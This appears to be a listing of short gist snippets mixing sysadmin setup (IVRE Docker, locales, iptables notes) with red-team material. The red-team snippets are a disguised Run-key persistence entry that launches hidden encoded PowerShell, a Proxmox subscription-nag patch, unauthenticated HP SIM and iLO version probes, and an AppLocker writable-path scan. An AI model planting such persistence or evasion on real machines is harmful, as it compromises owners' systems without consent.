natesubra

# https://tfl09.blogspot.com/2011/09/using-powershell-and-wmi-to-manage.html

$HKEY_CURRENT_USER = 2147483649
$Reg = [WMIClass]"ROOT\DEFAULT:StdRegProv" 
$Key = "Software\Microsoft\Windows\CurrentVersion\Run" 
$ValueName = "Microsoft Profiler"
$ValueData = "powershell.exe -nop -WindowStyle hiddeN -ExecuTionPolicy ByPasS -enc payload"
$Results = $Reg.SetStringValue($HKEY_CURRENT_USER, $Key, $ValueName, $ValueData)

natesubra

# https://github.com/cea-sec/ivre/blob/master/doc/DOCKER.md

docker pull ivre/db
docker pull ivre/web

docker run -d --name ivredb --hostname ivredb \
--volume "`pwd`/var_lib_mongodb":/var/lib/mongodb \
--volume "`pwd`/var_log_mongodb":/var/log/mongodb \
-v /ivredbvol \
ivre/db

natesubra

# https://github.com/cea-sec/ivre/blob/master/doc/DOCKER.md#a-command-line-client

docker pull ivre/client

docker run -i -t --name ivreclient --hostname ivreclient \
--link ivredb:ivredb --volume "`pwd`/ivre-share":/ivre-share \
ivre/client

natesubra

sudo sed -i "s/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/g" -i /etc/locale.gen
sudo locale-gen en_US.UTF-8
sudo update-locale en_US.UTF-8
export LANGUAGE=en_US.UTF-8
export LANG=en_US.UTF-8
export LC_ALL=en_US.UTF-8
echo "LC_ALL=en_US.UTF-8" | sudo tee -a /etc/environment
echo "en_US.UTF-8 UTF-8" | sudo tee -a /etc/locale.gen
echo "LANG=en_US.UTF-8" | sudo tee /etc/locale.conf

natesubra

#!/bin/sh

#######################################################
#
# Edits the proxmox Subscription file to make it
# think that it has a Subscription.
#
# Will disable the annoying login message about
# missing subscription.
#

natesubra

# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\"     | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

natesubra

Linux NetFilter, IP Tables and Conntrack Diagrams

IPTABLES TABLES and CHAINS

IPTables has the following 4 built-in tables.

1) Filter Table

Filter is default table for iptables. So, if you don’t define you own table, you’ll be using filter table. Iptables’s filter table has the following built-in chains.

natesubra

#!/bin/bash

# Checks the self reported version of HP System Management Homepage (HPSIM/HPSMH), no auth required

if [[ $# != 1 ]] ; then
    echo "usage: ./check_hpsim.sh <FQDN/Hostname/IP>"
else
    curl -i -s -k "https://$1:2381/cpqlogin.htm?RedirectUrl=/&RedirectQueryString=" | grep -i smhversion | head -n 1
fi

natesubra

#!/bin/bash

# Attribution: https://raymii.org/s/snippets/HP-ILO-Quickly-gather-firmware-and-version-information-with-CUR.html
# Quickly check HP iLO Firmware Version, no authentication required.

if [[ $# == 0 ]] ; then
        echo "Usage: check_ilo <FQDN/IP>"
else
        curl -i -s -k "https://$1/xmldata?item=All" | grep 'FWRI'
fi

natesubra

# Paths that we've already excluded via AppLocker.
$exclusions = @()

# Paths to process.
$paths = @(
  "C:\Windows"
)

# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"